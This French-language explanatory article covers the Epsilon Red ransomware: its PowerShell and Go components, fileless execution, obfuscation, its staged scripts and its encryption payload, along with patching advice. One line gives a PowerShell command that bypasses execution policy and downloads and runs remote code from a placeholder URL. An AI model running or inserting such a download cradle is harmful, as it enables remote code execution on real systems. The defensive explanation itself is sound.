Qu’est-ce que le ransomware Epsilon Red et êtes-vous à risque ?
Avez-vous patché vos serveurs ?
Une nouvelle menace de ransomware, connue sous le nom d'Epsilon Red, cible les serveurs Microsoft non corrigés dans les centres de données d'entreprise. Nommé d'après un méchant méconnu de la bande dessinée Marvel, Epsilon Red a récemment été découvert par une société de cybersécurité connue sous le nom de Sophos. Depuis sa découverte, le ransomware a attaqué de nombreuses organisations à travers le monde.
Qu'est-ce que PowerShell ?
Selon Sophos , le malware utilise une combinaison de programmation Go et de scripts PowerShell pour attaquer des cibles. Les fonctionnalités de script PowerShell d'Epsilon Red lui permettent de compromettre les serveurs Microsoft. PowerShell de Microsoft est un shell de ligne de commande et une plate-forme de programmation de scripts basés sur .NET Framework.
PowerShell offre des fonctionnalités telles que la capacité d'exécution de commandes à distance, l'accès aux principales API Microsoft, etc. Toutes ces fonctionnalités rendent PowerShell utile aux administrateurs système et aux utilisateurs pour automatiser les tâches et les processus de gestion du système d'exploitation.
Cependant, PowerShell peut également être utilisé comme un outil puissant pour créer des logiciels malveillants. La capacité des scripts à accéder aux outils Windows Management Instrumentation (WMI) de Microsoft en fait une option attrayante pour les attaquants. L'interface d'instrumentation de gestion de Windows permet aux scripts PowerShell d'être reconnus comme intrinsèquement dignes de confiance pour un système Microsoft. Cette confiance inhérente permet aux scripts PowerShell d'être utilisés comme une couverture efficace pour les ransomwares sans fichier.
Fournir un ransomware sans fichier avec PowerShell
Le ransomware sans fichier est une forme de logiciel malveillant qui s'exécute en s'appuyant sur un logiciel légitime. Les logiciels malveillants sans fichier basés sur PowerShell utilisent la capacité de PowerShell à se charger directement dans la mémoire d'un appareil. Cette fonctionnalité permet de protéger les logiciels malveillants dans les scripts PowerShell contre la détection.
Dans un scénario typique, lorsqu'un script s'exécute, il doit d'abord être écrit sur le disque d'un périphérique. Cela permet aux solutions de sécurité des terminaux de détecter le script. Étant donné que PowerShell est exclu des processus d'exécution de script standard, il peut contourner la sécurité des points de terminaison. De plus, l'utilisation d'un paramètre de contournement dans les scripts PowerShell permet aux attaquants de contourner les restrictions de script réseau.
Un exemple de paramètre de contournement PowerShell est :
powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString('url'))Comme vous pouvez le voir, il est relativement facile de concevoir des paramètres de contournement PowerShell.
En réponse, Microsoft a publié des correctifs pour remédier à la vulnérabilité d'exécution de logiciels malveillants à distance associée à PowerShell. Pourtant, les correctifs ne sont efficaces que lorsqu'ils sont utilisés. De nombreuses organisations ont assoupli les normes de correctifs qui laissent leurs environnements exposés. La conception d'Epsilon Red est de capitaliser sur cette exposition.
L'utilité à double tranchant d'Epsilon Red
Étant donné qu'Epsilon Red est plus efficace avec les serveurs Microsoft non corrigés, le logiciel malveillant peut être utilisé à la fois comme un ransomware et un outil de reconnaissance. Qu'Epsilon réussisse ou non dans un environnement donne à un attaquant un aperçu plus approfondi des capacités de sécurité d'une cible.
Si Epsilon réussit à accéder à un serveur Microsoft Exchange, une organisation a montré qu'elle ne se conforme pas aux meilleures pratiques de sécurité courantes en matière de correctifs. Pour un attaquant, cela peut indiquer la facilité avec laquelle le reste de l'environnement d'une cible peut être infiltré par Epsilon.
Epsilon Red utilise des techniques d'obscurcissement pour masquer sa charge utile. L'obscurcissement rend le code illisible et est utilisé dans les logiciels malveillants PowerShell pour éviter la haute lisibilité des scripts PowerShell. Avec l'obscurcissement, les applets de commande d'alias PowerShell sont utilisées pour empêcher les logiciels antivirus d'identifier les scripts malveillants dans les journaux de PowerShell.
Pourtant, les scripts PowerShell obscurcis peuvent être identifiés avec l'œil droit. Un signe courant d'une attaque de script PowerShell imminente est la création d'un objet WebClient. Un attaquant créera un objet WebClient dans le code PowerShell pour établir une connexion externe à une URL distante contenant du code malveillant.
Si une organisation peut être piratée en raison d'un correctif souple, les chances qu'elle dispose d'une protection de sécurité suffisante capable de détecter les scripts PowerShell obscurcis sont réduites. En revanche, si Epsilon Red ne parvient pas à infiltrer un serveur, cela indique à un attaquant que le réseau d'une cible peut être en mesure de désobscurcir rapidement les logiciels malveillants PowerShell, rendant l'attaque moins précieuse.
Infiltration du réseau d'Epsilon Red
La fonctionnalité d'Epsilon Red est simple. Le logiciel utilise une série de scripts Powershell pour infiltrer les serveurs. Ces scripts PowerShell sont numérotés de 1.ps1 à 12.ps1. La conception de chaque script PowerShell consiste à préparer un serveur cible pour la charge utile finale.
Tous les scripts PowerShell dans Epsilon Red ont un objectif individualisé. L'un des scripts PowerShell d'Epsilon Red est conçu pour contourner les règles de pare-feu réseau d'une cible. Un autre de la série est conçu pour désinstaller le logiciel antivirus d'une cible.
Comme vous pouvez le deviner, ces scripts fonctionnent à l'unisson pour garantir que lorsque la charge utile est livrée, une cible ne sera pas en mesure d'arrêter rapidement sa progression.
Livraison de la charge utile
Lorsque les scripts PowerShell d'Epsilon ont ouvert la voie à sa charge utile finale, il est livré sous forme d'extension, Red.exe. Une fois qu'il a infiltré un serveur, Red.exe analyse les fichiers du serveur et dresse une liste des chemins de répertoire pour chaque fichier qu'il découvre. Après la création de la liste, les processus enfants sont générés à partir du fichier malveillant parent pour chaque chemin de répertoire de la liste. Ensuite, chaque fichier enfant de ransomware crypte un chemin de répertoire à partir du fichier de liste.
Une fois que tous les chemins de répertoires de la liste d'Epsilon ont été chiffrés, un fichier .txt est laissé pour notifier une cible et énoncer les demandes de l'attaquant. De plus, tous les nœuds de réseau accessibles connectés au serveur compromis sont alors infiltrés et la portée du malware sur le réseau peut progresser.
Qui se cache derrière Epsilon Red ?
L'identité des attaquants utilisant Epsilon Red est encore inconnue. Mais, certains indices font allusion aux origines des attaquants. Le premier indice est le nom du malware. Epsilon Red est un méchant X-Men avec une histoire d'origine russe.
Le deuxième indice se trouve dans la note de rançon du fichier .txt laissée par le code. Il est similaire à la note laissée par un gang de ransomware connu sous le nom de REvil. Cependant, cette similitude n'indique pas que les agresseurs sont membres du gang. REvil exploite une opération RaaS (Ransomware as a service) où les affiliés paient REvil pour accéder à ses logiciels malveillants.
Se protéger du rouge Epsilon
Jusqu'à présent, Epsilon Red a infiltré avec succès des serveurs non corrigés. Cela signifie que l'une des meilleures défenses contre Epsilon Red et les logiciels malveillants ransomware similaires consiste à s'assurer que votre environnement est correctement géré. De plus, disposer d'une solution de sécurité capable de désobscurcir rapidement les scripts PowerShell sera un ajout bénéfique à votre environnement.